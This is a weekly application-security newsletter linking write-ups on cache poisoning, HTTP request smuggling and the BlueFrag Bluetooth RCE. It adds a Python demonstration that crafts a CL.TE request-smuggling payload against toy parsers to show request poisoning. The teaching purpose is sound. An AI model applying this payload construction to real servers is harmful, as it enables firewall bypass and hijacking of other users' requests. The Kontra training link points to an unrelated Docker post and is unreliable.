Application Security This Week for April 26

A really good breakdown of exploiting HTTP path normalization together with web cache poisoning (here, to steal Rocket League accounts).

https://samcurry.net/abusing-http-path-normalization-and-cache-poisoning-to-steal-rocket-league-accounts/

A further reminder that HTTP parsing is the weakest link: a worked exploitation example of HTTP Request Smuggling, used here to get an XXE payload past the firewall.

https://honoki.net/2020/03/18/xxe-scape-through-the-front-door-circumventing-the-firewall-with-http-request-smuggling/
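The parser disagreement at the heart of request smuggling, as an added example that is not from the linked post or its author: a front end that trusts Content-Length and a back end that trusts Transfer-Encoding: chunked read the same bytes, and the back end is left holding a "GET /admin" prefix that becomes the start of the next request on the shared connection. The hostnames, paths and parsers are constructed for illustration.

```python
# Added example: CL.TE desync between two toy HTTP/1.1 parsers.
# Both parsers are simplified stand-ins, not any real proxy's code.


def split_headers(raw: bytes):
    """Split a raw request into (request line, header dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def frontend_parse(raw: bytes):
    """Front end: honours Content-Length, ignores Transfer-Encoding.
    Returns (request line, bytes left unread on the connection)."""
    request_line, headers, body = split_headers(raw)
    n = int(headers.get(b"content-length", b"0"))
    return request_line, body[n:]


def backend_parse(raw: bytes):
    """Back end: honours Transfer-Encoding: chunked, ignores Content-Length.
    Returns (request line, bytes left unread on the connection)."""
    request_line, headers, body = split_headers(raw)
    if headers.get(b"transfer-encoding", b"").lower() != b"chunked":
        n = int(headers.get(b"content-length", b"0"))
        return request_line, body[n:]
    pos = 0
    while True:
        line_end = body.index(b"\r\n", pos)
        size = int(body[pos:line_end], 16)   # chunk size line, hex
        pos = line_end + 2
        if size == 0:
            pos += 2                          # CRLF that ends the last chunk
            break
        pos += size + 2                       # chunk data plus its CRLF
    return request_line, body[pos:]


def smuggled_request() -> bytes:
    """Constructed attacker request: a zero-length chunked body followed by
    the prefix of a second request. Content-Length covers the whole thing."""
    body = b"0\r\n\r\nGET /admin HTTP/1.1\r\nFoo: x"
    return (
        b"POST /search HTTP/1.1\r\n"
        b"Host: example.invalid\r\n"
        b"Content-Length: " + str(len(body)).encode() + b"\r\n"
        b"Transfer-Encoding: chunked\r\n"
        b"\r\n" + body
    )


# Constructed request from an unrelated client, forwarded next on the
# same back-end connection.
NEXT_VICTIM = b"GET / HTTP/1.1\r\nHost: example.invalid\r\n\r\n"


def desync():
    """Show the two views of one request and the resulting poisoned request.
    Returns (front-end leftover, back-end leftover, request line the back end
    sees for the next client)."""
    raw = smuggled_request()
    _, fe_left = frontend_parse(raw)
    _, be_left = backend_parse(raw)
    # The back end prepends its unread bytes to whatever arrives next, so the
    # victim's request line is swallowed into a "Foo:" header and the victim
    # is served /admin instead of /.
    poisoned_line, _, _ = split_headers(be_left + NEXT_VICTIM)
    return fe_left, be_left, poisoned_line


if __name__ == "__main__":
    fe_left, be_left, poisoned = desync()
    print("front end leftover:", fe_left)
    print("back end leftover: ", be_left)
    print("next request becomes:", poisoned)
```

The front end consumes all 32 body bytes and sees one well-formed request, which is why a WAF or firewall in front of the back end has nothing to object to; the back end stops at the zero chunk and the rest waits in its buffer for the next client. Real servers are messier than these two parsers (many reject requests carrying both headers, as RFC 7230 requires), which is exactly why the linked post is worth reading for the practical details.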

Extraordinarily hard to exploit, but a fascinating bug to look at: CVE-2020-0022 (BlueFrag), a zero-click RCE in the Bluetooth stack of Android 8.0 to 9.0.

https://insinuator.net/2020/04/cve-2020-0022-an-android-8-0-9-0-bluetooth-zero-click-rce-bluefrag/

A lot of people have put their online training up for free (for a limited time), like Pluralsight.  Here's another one, by Kontra.  I haven't done it yet, but it comes highly recommended.

https://blogs.akamai.com/sitr/2020/04/a-brief-history-of-a-rootable-docker-image.html

That’s it for the news of the week. Everyone stay safe and healthy!

S